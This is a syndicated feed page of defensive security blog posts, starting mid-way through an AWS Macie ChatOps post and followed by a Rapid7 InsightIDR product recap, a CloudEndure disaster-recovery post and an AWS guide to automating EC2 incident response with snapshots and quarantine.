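You can also confirm the result programmatically, for example by listing the quarantine bucket with boto3. The bucket name below is a placeholder; use the one shown in the notification details.

    import boto3

    s3 = boto3.client("s3")
    quarantine_bucket = "your-quarantine-bucket"  # placeholder from the notification details

    for obj in s3.list_objects_v2(Bucket=quarantine_bucket).get("Contents", []):
        print(obj["Key"], obj["LastModified"])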

Congratulations! You now have a fully operational solution to detect and respond to Macie sensitive data findings through a Slack ChatOps workflow.

Solution cleanup

To remove the solution and avoid incurring additional charges from the AWS resources that you deployed, complete the following steps.

To remove the solution and associated resources

  1. Navigate to the Macie console. Under Settings, choose Suspend Macie.
  2. Navigate to the S3 console and delete all objects in the quarantine bucket.
  3. Run the command cdk destroy from the command line within the root directory of the project. You will be prompted to confirm that you want to remove the solution. Press y.

Summary

In this blog post, I showed you how to integrate Amazon Macie sensitive data findings with an auto-remediation and Slack ChatOps workflow. We reviewed the AWS services used, how they are integrated, and the steps to configure, deploy, and test the solution. With Macie and the solution in this blog post, you can substantially reduce the heavy lifting associated with detecting and responding to sensitive data in your AWS environment.

I encourage you to take this solution and customize it to your needs. Further enhancements could include supporting policy findings, adding additional remediation actions, or integrating with additional findings from AWS Security Hub.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon Macie forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Nick Cuneo

Nick is an Enterprise Solutions Architect at AWS who works closely with Australia’s largest financial services organisations. His previous roles span operations, software engineering, and design. Nick is passionate about application and network security, automation, microservices, and event-driven architectures. Outside of work, he enjoys motorsport and can be found most weekends in his garage wrenching on cars.

What’s New in InsightIDR: Q4 2020 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2020/12/18/whats-new-in-insightidr-q4-2020-in-review/


Throughout the year, we’ve provided roundups of what’s new in InsightIDR, our cloud-based SIEM tool (see the H1 recap post, and our most recent Q3 2020 recap post). As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

Complete endpoint visibility with enhanced endpoint telemetry (EET)

With the addition of the enhanced endpoint telemetry (EET) add-on module, InsightIDR customers now have the ability to access all process start activity data (aka any events captured when an application, service, or other process starts on an endpoint) in InsightIDR’s log search. This data provides a full picture of endpoint activity, enabling customers to create custom detections, see the full scope of an attack, and effectively detect and respond to incidents. Read more about this new add-on in our blog here, and see our on-demand demo below.

Network Traffic Analysis: Insight Network Sensor for AWS now in general availability

In our last quarterly recap, we introduced our early access period for the Insight Network Sensor for AWS, and today we’re excited to announce its general availability. Now, all InsightIDR customers can deploy a network sensor on their AWS Virtual Private Cloud and configure it to communicate with InsightIDR. This new sensor generates the same data outputs as the existing Insight Network Sensor, and its ability to deploy in AWS cloud environments opens up a whole new way for customers to gain insight into what is happening within their cloud estates. For more details, check out the requirements here.


New Attacker Behavior Analytics (ABA) threats

Our threat intelligence and detection engineering (TIDE) team and SOC experts are constantly updating our detections as they discover new threats. Most recently, our team added 86 new Attacker Behavior Analytics (ABA) threats within InsightIDR. Each of these threats is a collection of three rules looking for one of 38,535 specific Indicators of Compromise (IoCs) known to be associated with a malicious actor’s various aliases.  

In total, we have 258 new rules, or three for each type of threat. The new rule types for each threat are as follows:

  • Suspicious DNS Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Web Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Process – <Malicious Actor Name> Related Binary Executed

New InsightIDR detections for activity related to recent SolarWinds Orion attack: The Rapid7 Threat Detection & Response team has compared publicly available indicators against our existing detections, deployed new detections, and updated our existing detection rules as needed. We also published in-product queries so that customers can quickly determine whether activity related to the breaches has occurred within their environment. Rapid7 is closely monitoring the situation, and will continue to update our detections and guidance as more information becomes available. See our recent blog post for additional details.

Custom Parser editing

InsightIDR customers leveraging our Custom Parsing Tool can now edit fields in their pre-existing parsers. With this new addition, you can update the parser name, extract additional fields, and edit existing extracted fields. For detailed information on our Custom Parsing Tool capabilities, check out our help documentation here.


Record user-driven and automated activity with Audit Logging

Available to all InsightIDR customers, our new Audit Logging service is now in Open Preview. Audit logging enables you to track user-driven and automated activity in InsightIDR and across Rapid7’s Insight Platform, so you can investigate who did what, when. Audit Logging will also help you fulfill compliance requirements if these details are requested by an external auditor. Learn more about the Audit Logging Open Preview in our help docs here, and see step-by-step instructions for how to turn it on here.


New event source integrations: Cybereason, Sophos Intercept X, and DivvyCloud by Rapid7

With our recent event source integrations with Cybereason and Sophos Intercept X, InsightIDR customers can spend less time jumping in and out of multiple endpoint protection tools and more time focusing on investigating and remediating attacks within InsightIDR.

  • Cybereason: Cybereason’s Endpoint Detection and Response (EDR) platform detects events that signal malicious operations (Malops), which can now be fed as an event source to InsightIDR. With this new integration, every time an alert fires in Cybereason, it will get relayed to InsightIDR. Read more in our recent blog post here.
  • Sophos Intercept X: Sophos Intercept X is an endpoint protection tool used to detect malware and viruses in your environment. InsightIDR features a Sophos Intercept X event source that you can configure to parse alert types as Virus Alert events. Check out our help documentation here.
  • DivvyCloud: This past spring, Rapid7 acquired DivvyCloud, a leader in Cloud Security Posture Management (CSPM) that provides real-time analysis and automated remediation for cloud and container technologies. Now, we’re excited to announce a custom log integration where cloud events from DivvyCloud can be sent to InsightIDR for analysis, investigations, reporting, and more. Check out our help documentation here.

Stay tuned for more!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.

Not an InsightIDR customer? Start a free trial today.

Get Started

Integrating CloudEndure Disaster Recovery into your security incident response plan

Post Syndicated from Gonen Stein original https://aws.amazon.com/blogs/security/integrating-cloudendure-disaster-recovery-into-your-security-incident-response-plan/

An incident response plan (also known as an incident response procedure) contains the detailed actions an organization takes to prepare for a security incident in its IT environment. It also includes the mechanisms to detect, analyze, contain, eradicate, and recover from a security incident. Every incident response plan should contain a section on recovery, which outlines scenarios ranging from single-component to full-environment recovery. This recovery section should include disaster recovery (DR), with procedures to recover your environment from complete failure. Effective recovery from an IT disaster requires tools that can automate preparation, testing, and recovery processes. In this post, I explain how to integrate CloudEndure Disaster Recovery into the recovery section of your incident response plan. CloudEndure Disaster Recovery is an Amazon Web Services (AWS) DR solution that enables fast, reliable recovery of physical, virtual, and cloud-based servers on AWS. This post also discusses how you can use CloudEndure Disaster Recovery to reduce downtime and data loss when responding to a security incident, and best practices for maintaining your incident response plan.

How disaster recovery fits into a security incident response plan

The AWS Well-Architected Framework security pillar provides guidance to help you apply best practices and current recommendations in the design, delivery, and maintenance of secure AWS workloads. It includes a recommendation to integrate tools to secure and protect your data. A secure data replication and recovery tool helps you protect your data if there’s a security incident and quickly return to normal business operation as you resolve the incident. The recovery section of your incident response plan should define recovery point objectives (RPOs) and recovery time objectives (RTOs) for your DR-protected workloads. RPO is the window of time that data loss can be tolerated due to a disruption. RTO is the amount of time permitted to recover workloads after a disruption.

Your DR response to a security incident can vary based on the type of incident you encounter. For example, your DR plan for responding to a security incident such as ransomware—which involves data corruption—should describe how to recover workloads on your secondary DR site using a recovery point prior to the data corruption. This use case will be discussed further in the next section.

In addition to tools and processes, your security incident response plan should define the roles and responsibilities necessary during an incident. This includes the people and roles in your organization who perform incident mitigation steps, in addition to those who need to be informed and consulted. This can include technology partners, application owners, or subject matter experts (SMEs) outside of your organization who can offer additional expertise. DR-related roles for your incident response plan include:

  • A person who analyzes the situation and provides visibility to decision-makers.
  • A person who decides whether or not to trigger a DR response.
  • A person who actively triggers the DR response.

Be sure to include all of the stakeholders you identify in your documented security incident response procedures and runbooks. Test your plan to verify that the people in these roles have the pre-provisioned access they need to perform their defined role.

How to use CloudEndure Disaster Recovery during a security incident

CloudEndure Disaster Recovery continuously replicates your servers—including OS, system state configuration, databases, applications, and files—to a staging area in your target AWS Region. The staging area contains low-cost resources automatically provisioned and managed by CloudEndure Disaster Recovery. This reduces the cost of provisioning duplicate resources during normal operation. Your fully provisioned recovery environment is launched only during an incident or drill.

If your organization experiences a security incident that can be remediated using DR, you can use CloudEndure Disaster Recovery to perform failover to your target AWS Region from your source environment. When you perform failover, CloudEndure Disaster Recovery orchestrates the recovery of your environment in your target AWS Region. This enables quick recovery, with RPOs of seconds and RTOs of minutes.

To deploy CloudEndure Disaster Recovery, you must first install the CloudEndure agent on the servers in your environment that you want to replicate for DR, and then initiate data replication to your target AWS Region. Once data replication is complete and your data is in sync, you can launch machines in your target AWS Region from the CloudEndure User Console. CloudEndure Disaster Recovery enables you to launch target machines in either Test Mode or Recovery Mode. Your launched machines behave the same way in either mode; the only difference is how the machine lifecycle is displayed in the CloudEndure User Console. Launch machines by opening the Machines page, shown in the following figure, and selecting the machines you want to launch. Then select either Test Mode or Recovery Mode from the Launch Target Machines menu.
 

Figure 1: Machines page on the CloudEndure User Console


You can launch your entire environment, a group of servers comprising one or more applications, or a single server in your target AWS Region. When you launch machines from the CloudEndure User Console, you’re prompted to choose a recovery point from the Choose Recovery Point dialog box (shown in the following figure).

Use point-in-time recovery to respond to security incidents that involve data corruption, such as ransomware. Your incident response plan should include a mechanism to determine when data corruption occurred. Knowing how to determine which recovery point to choose in the CloudEndure User Console helps you minimize response time during a security incident. Each recovery point is a point-in-time snapshot of your servers that you can use to launch recovery machines in your target AWS Region. Select the latest recovery point before the data corruption to restore your workloads on AWS, and then choose Continue With Launch.
 

Figure 2: Selection of an earlier recovery point from the Choose Recovery Point dialog box


Run your recovered workloads in your target AWS Region until you’ve resolved the security incident. When the incident is resolved, you can perform failback to your primary environment using CloudEndure Disaster Recovery. You can learn more about CloudEndure Disaster Recovery setup, operation, and recovery by taking this online CloudEndure Disaster Recovery Technical Training.

Test and maintain the recovery section of your incident response plan

Your entire incident response plan must be kept accurate and up to date in order to effectively remediate security incidents if they occur. A best practice for achieving this is through frequently testing all sections of your plan, including your tools. When you first deploy CloudEndure Disaster Recovery, begin running tests as soon as all of your replicated servers are in sync on your target AWS Region. DR solution implementation is generally considered complete when all initial testing has succeeded.

By correctly configuring the networking and security groups in your target AWS Region, you can use CloudEndure Disaster Recovery to launch a test workload in an isolated environment without impacting your source environment. You can run tests as often as you want. Tests don’t incur additional fees beyond payment for the fully provisioned resources generated during tests.

Testing involves two main components: launching the machines you wish to test on AWS, and performing user acceptance testing (UAT) on the launched machines.

  1. Launch machines to test.
     
    Select the machines to test from the Machines page of the CloudEndure User Console by selecting the check box next to the machine. Then choose Test Mode from the Launch Target Machines menu, as shown in the following figure. You can select the latest recovery point or an earlier recovery point.
     
    Figure 3: Select Test Mode to launch selected machines


     

    The following figure shows the CloudEndure User Console. The Disaster Recovery Lifecycle column shows that the machines have been Tested Recently.

    Figure 4: Machines launched in Test Mode display purple icons in the Status column and Tested Recently in the Disaster Recovery Lifecycle column


  2. Perform UAT testing.
     
    Begin UAT testing when the machine launch job is successfully completed and your target machines have booted.

After you’ve successfully deployed, configured, and tested CloudEndure Disaster Recovery on your source environment, add it to your ongoing change management processes so that your incident response plan remains accurate and up-to-date. This includes deploying and testing CloudEndure Disaster Recovery every time you add new servers to your environment. In addition, monitor for changes to your existing resources and make corresponding changes to your CloudEndure Disaster Recovery configuration if necessary.

How CloudEndure Disaster Recovery keeps your data secure

CloudEndure Disaster Recovery has multiple mechanisms to keep your data secure and not introduce new security risks. Data replication is performed using AES 256-bit encryption in transit. Data at rest can be encrypted by using Amazon Elastic Block Store (Amazon EBS) encryption with an AWS managed key or a customer key. Amazon EBS encryption is supported by all volume types, and includes built-in key management infrastructure that has no performance impact. Replication traffic is transmitted directly from your source servers to your target AWS Region, and can be restricted to private connectivity such as AWS Direct Connect or a VPN. CloudEndure Disaster Recovery is ISO 27001 and GDPR compliant and HIPAA eligible.
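
If you want to confirm that new volumes in your target AWS Region are encrypted at rest by default, you can check, and optionally enable, account-level default EBS encryption with a few lines of boto3. This is standard Amazon EC2 API usage shown here for convenience, not a CloudEndure-specific requirement.

    import boto3

    ec2 = boto3.client("ec2", region_name="us-east-1")  # your target DR Region

    if ec2.get_ebs_encryption_by_default()["EbsEncryptionByDefault"]:
        print("Default EBS encryption is already enabled in this Region.")
    else:
        ec2.enable_ebs_encryption_by_default()
        print("Default EBS encryption enabled; new volumes will be encrypted at rest.")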

Summary

Each organization tailors its incident response plan to meet its unique security requirements. As described in this post, you can use CloudEndure Disaster Recovery to improve your organization’s incident response plan. I also explained how to recover from an earlier point in time when you respond to security incidents involving data corruption, and how to test your servers as part of maintaining the DR section of your incident response plan. By following the guidance in this post, you can improve your IT resilience and recover more quickly from security incidents. You can also reduce your DR operational costs by avoiding duplicate provisioning of your DR infrastructure.

Visit the CloudEndure Disaster Recovery product page if you would like to learn more. You can also view the AWS Raise the Bar on Data Protection and Security webinar series for additional information on how to protect your data and improve IT resilience on AWS.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Gonen Stein

Gonen is the Head of Product Strategy for CloudEndure, an AWS company. He combines his expertise in business, cloud infrastructure, storage, and information security to assist enterprise organizations with developing and deploying IT resilience and business continuity strategies in the cloud.

How to automate incident response in the AWS Cloud for EC2 instances

Post Syndicated from Ben Eichorst original https://aws.amazon.com/blogs/security/how-to-automate-incident-response-in-aws-cloud-for-ec2-instances/

One of the security epics core to the AWS Cloud Adoption Framework (AWS CAF) is a focus on incident response and preparedness to address unauthorized activity. Multiple methods exist in Amazon Web Services (AWS) for automating classic incident response techniques, and the AWS Security Incident Response Guide outlines many of these methods. This post demonstrates one specific method for instantaneous response and acquisition of infrastructure data from Amazon Elastic Compute Cloud (Amazon EC2) instances.

Incident response starts with detection, progresses to investigation, and then follows with remediation. This process is no different in AWS. AWS services such as Amazon GuardDuty, Amazon Macie, and Amazon Inspector provide detection capabilities. Amazon Detective assists with investigation, including tracking and gathering information. Then, after your security organization decides to take action, pre-planned and pre-provisioned runbooks enable faster action towards a resolution. One principle outlined in the incident response whitepaper and the AWS Well-Architected Framework is the notion of pre-provisioning systems and policies to allow you to react quickly to an incident response event. The solution I present here provides a pre-provisioned architecture for an incident response system that you can use to respond to a suspect EC2 instance.

Infrastructure overview

The architecture that I outline in this blog post automates these standard actions on a suspect compute instance:

  1. Capture all the persistent disks.
  2. Capture the instance state at the time the incident response mechanism is started.
  3. Isolate the instance and protect against accidental instance termination.
  4. Perform operating system–level information gathering, such as memory captures and other parameters.
  5. Notify the administrator of these actions.

The solution in this blog post accomplishes these tasks through the following logical flow of AWS services, illustrated in Figure 1.
 

Figure 1: Infrastructure deployed by the accompanying AWS CloudFormation template and associated task flow when invoking the main API


  1. A user or application calls an API with an EC2 instance ID to start data collection.
  2. Amazon API Gateway initiates the core logic of the process by instantiating an AWS Lambda function.
  3. The Lambda function performs the following data-gathering steps before making any changes to the infrastructure (a simplified sketch of the key API calls in steps 3 and 4 appears after this list):
    1. Save instance metadata to the SecResponse Amazon Simple Storage Service (Amazon S3) bucket.
    2. Save a snapshot of the instance console to the SecResponse S3 bucket.
    3. Initiate an Amazon Elastic Block Store (Amazon EBS) snapshot of all persistent block storage volumes.
  4. The Lambda function then modifies the infrastructure to continue gathering information, by doing the following steps:
    1. Set the Amazon EC2 termination protection flag on the instance.
    2. Remove any existing EC2 instance profile from the instance.
    3. If the instance is managed by AWS Systems Manager:
      1. Attach an EC2 instance profile with minimal privileges for operating system–level information gathering.
      2. Perform operating system–level information gathering actions through Systems Manager on the EC2 instance.
      3. Remove the instance profile after Systems Manager has completed its actions.
    4. Create a quarantine security group that lacks both ingress and egress rules.
    5. Move the instance into the created quarantine security group for isolation.
  5. Send an administrative notification through the configured Amazon Simple Notification Service (Amazon SNS) topic.
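
To make steps 3 and 4 more concrete, here is a simplified boto3 sketch of the key API calls involved. It is not the Lambda code deployed by the CloudFormation template; error handling, metadata capture to S3, instance profile handling, Systems Manager actions, and creation of the quarantine security group are omitted.

    import boto3

    ec2 = boto3.client("ec2")


    def quarantine_and_snapshot(instance_id: str, quarantine_sg_id: str) -> list:
        """Snapshot the suspect instance's disks, protect it, then isolate it."""
        reservation = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"][0]
        instance = reservation["Instances"][0]

        # Step 3c: snapshot every attached EBS volume before changing anything.
        snapshot_ids = []
        for mapping in instance.get("BlockDeviceMappings", []):
            if "Ebs" not in mapping:
                continue
            volume_id = mapping["Ebs"]["VolumeId"]
            snap = ec2.create_snapshot(
                VolumeId=volume_id,
                Description=f"IR snapshot of {volume_id} from {instance_id}",
            )
            snapshot_ids.append(snap["SnapshotId"])

        # Step 3b: capture a console screenshot; the deployed solution saves this to S3.
        ec2.get_console_screenshot(InstanceId=instance_id, WakeUp=True)

        # Step 4a: guard against accidental termination.
        ec2.modify_instance_attribute(
            InstanceId=instance_id, DisableApiTermination={"Value": True}
        )

        # Steps 4d and 4e: move the instance into a quarantine security group with no rules.
        ec2.modify_instance_attribute(InstanceId=instance_id, Groups=[quarantine_sg_id])

        return snapshot_ids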

Solution features

By using the mechanisms outlined in this post to codify your incident response runbooks, you can realize the following benefits in your incident response plan.

Preparation for incident response before an incident occurs

Both the AWS CAF and Well-Architected Framework recommend that customers formulate known procedures for incident response, and test those runbooks before an incident. Testing these processes before an event occurs decreases the time it takes you to respond in a production environment. The sample infrastructure shown in this post demonstrates how you can standardize those procedures.

Consistent incident response artifact gathering

Codifying your processes into set code and infrastructure not only prepares you to collect data when you need it, but also standardizes the collection process into a repeatable, auditable record of what information was collected, when, and how. This reduces the likelihood of missing data for future investigations.

Walkthrough: Deploying infrastructure and starting the process

To implement the solution outlined in this post, you first need to deploy the infrastructure, and then start the data collection process by issuing an API call.

The code example in this blog post requires that you provision an AWS CloudFormation stack, which creates an S3 bucket for storing your event artifacts and a serverless API that uses API Gateway and Lambda. You then execute a query against this API to take action on a target EC2 instance.

The infrastructure deployed by the AWS CloudFormation stack is a set of AWS components as depicted previously in Figure 1. The stack includes all the services and configurations to deploy the demo. It doesn’t include a target EC2 instance that you can use to test the mechanism used in this post.

Cost

The cost for this demo is minimal because the base infrastructure is completely serverless. With AWS, you only pay for the infrastructure that you use, so the single API call issued in this demo costs fractions of a cent. Artifact storage incurs standard Amazon S3 storage charges, and the Amazon EBS snapshots created by the solution are billed at standard snapshot rates.

Deploy the AWS CloudFormation stack

In future posts and updates, we will show how to set up this security response mechanism inside a separate account designated for security, but for the purposes of this post, your demo stack must reside in the same AWS account as the target instance that you set up in the next section.

First, start by deploying the AWS CloudFormation template to provision the infrastructure.

To deploy this template in the us-east-1 region

  1. Choose the Launch Stack button to open the AWS CloudFormation console pre-loaded with the template:
     
    Select the Launch Stack button to launch the template
  2. (Optional) In the AWS CloudFormation console, on the Specify Details page, customize the stack name.
  3. For the LambdaS3BucketLocation and LambdaZipFileName fields, leave the default values for the purposes of this blog. Customizing this field allows you to customize this code example for your own purposes and store it in an S3 bucket of your choosing.
  4. Customize the S3BucketName field. This needs to be a globally unique S3 bucket name. This bucket is where gathered artifacts are stored for the demo in this blog. You must customize it beyond the default value for the template to instantiate properly.
  5. (Optional) Customize the SNSTopicName field. This name provides a meaningful label for the SNS topic that notifies the administrator of the actions that were performed.
  6. Choose Next to configure the stack options and leave all default settings in place.
  7. Choose Next to review and scroll to the bottom of the page. Select all three check boxes under the Capabilities and Transforms section, next to each of the three acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources.
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  8. Choose Create Stack.

Set up a target EC2 instance

In order to demonstrate the functionality of this mechanism, you need a target host. Provision any EC2 instance in your account to act as a target for the security response mechanism to collect information from and quarantine. To keep costs low while demonstrating full functionality, I recommend choosing a small instance size (for example, t2.nano) and optionally enrolling the instance in Systems Manager so that you can later run commands against it through the Run Command API. For more details on configuring Systems Manager, refer to the AWS Systems Manager User Guide.

Retrieve required information for system initiation

The entire security response mechanism triggers through an API call. To successfully initiate this call, you first need to gather the API URI and key information.

To find the API URI and key information

  1. Navigate to the AWS CloudFormation console and choose the stack that you’ve instantiated.
  2. Choose the Outputs tab and save the value for the key APIBaseURI. This is the base URI for the API Gateway. It will resemble https://abcdefgh12.execute-api.us-east-1.amazonaws.com.
  3. Next, navigate to the API Gateway console and choose the API with the name SecurityResponse.
  4. Choose API Keys, and then choose the only key present.
  5. Next to the API key field, choose Show to reveal the key, and then save this value to a notepad for later use.

(Optional) Configure administrative notification through the created SNS topic

One aspect of this mechanism is that it sends notifications through SNS topics. You can optionally subscribe your email or another notification pipeline mechanism to the created SNS topic in order to receive notifications on actions taken by the system.
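
For example, you can subscribe an email address to the topic through the SNS console or with a few lines of boto3; the topic ARN and address below are placeholders.

    import boto3

    sns = boto3.client("sns")
    sns.subscribe(
        TopicArn="arn:aws:sns:us-east-1:111122223333:SecResponseTopic",  # placeholder ARN
        Protocol="email",
        Endpoint="security-team@example.com",
    )
    # The address receives a confirmation email that must be accepted
    # before notifications are delivered.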

Initiate the security response mechanism

Note that, in this demo code, you’re using a simple API key for limiting access to API Gateway. In production applications, you would use an authentication mechanism such as Amazon Cognito to control access to your API.

To kick off the security response mechanism, initiate a REST API query against the API that was created in the AWS CloudFormation template. You first create this API call by using a curl command to be run from a Linux system.

To create the API initiation curl command

  1. Copy the following example curl command.
    curl -v -X POST -i -H "x-api-key: 012345ABCDefGHIjkLMS20tGRJ7othuyag" https://abcdefghi.execute-api.us-east-1.amazonaws.com/DEMO/secresponse -d '{
      "instance_id":"i-123457890"
    }'
    

  2. Replace the placeholder API key specified in the x-api-key HTTP header with your API key.
  3. Replace the example URI path with your API’s specific URI. To create the full URI, concatenate the base URI listed in the AWS CloudFormation output you gathered previously with the API call path, which is /DEMO/secresponse. This full URI for your specific API call should closely resemble this sample URI path: https://abcdefghi.execute-api.us-east-1.amazonaws.com/DEMO/secresponse
  4. Replace the value associated with the key instance_id with the instance ID of the target EC2 instance you created.

Because this mechanism initiates through a simple API call, you can easily integrate it with existing workflow management systems. This allows for complex data collection and forensic procedures to be integrated with existing incident response workflows.
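
For example, a step in a workflow or SOAR platform could make the same call with a few lines of Python instead of curl. The URL, API key, and instance ID below are the same placeholders used in the curl example.

    import requests

    response = requests.post(
        "https://abcdefghi.execute-api.us-east-1.amazonaws.com/DEMO/secresponse",
        headers={"x-api-key": "012345ABCDefGHIjkLMS20tGRJ7othuyag"},
        json={"instance_id": "i-123457890"},
        timeout=30,
    )
    response.raise_for_status()
    print(response.status_code, response.text)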

Review the gathered data

After the mechanism completes, you should find the following items uploaded as objects to the security response S3 bucket:

  1. A console screenshot, as shown in Figure 2.
  2. (If Systems Manager is configured) stdout information from the commands that were run on the host operating system.
  3. Instance metadata in JSON form.

 

Figure 2: Example outputs from a successful completion of this blog post's mechanism


Additionally, if you load the Amazon EC2 console and scroll down to Elastic Block Store, you can see that EBS snapshots are present for all persistent disks as shown in Figure 3.
 

Figure 3: Evidence of an EBS snapshot from a successful run


You can also verify that the previously outlined security controls are in place by viewing the instance in the Amazon EC2 console. You should see the removal of AWS Identity and Access Management (IAM) roles from the target EC2 instances and that the instance has been placed into network isolation through a newly created quarantine security group.

Note that for the purposes of this demo, all information that you gathered is stored in the same AWS account as the workload. As a best practice, many AWS customers choose instead to store this information in an AWS account that’s specifically designated for incident response and analysis. A dedicated account provides clear isolation of function and restriction of access. Using AWS Organizations service control policies (SCPs) and IAM permissions, your security team can limit access to adhere to security policy, legal guidance, and compliance regulations.

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your security response S3 bucket. Then delete the CloudFormation stack that was provisioned at the start of this process in order to clean up all remaining infrastructure.

Conclusion

Placing workloads in the AWS Cloud allows for pre-provisioned and explicitly defined incident response runbooks to be codified and quickly executed on suspect EC2 instances. This enables you to gather data in minutes that previously took hours or even days using manual processes.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon EC2 forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Ben Eichorst

Ben is a Senior Solutions Architect, Security, Cryptography, and Identity Specialist for AWS. He works with AWS customers to efficiently implement globally scalable security programs while empowering development teams and reducing risk. He holds a BA from Northwestern University and an MBA from the University of Colorado.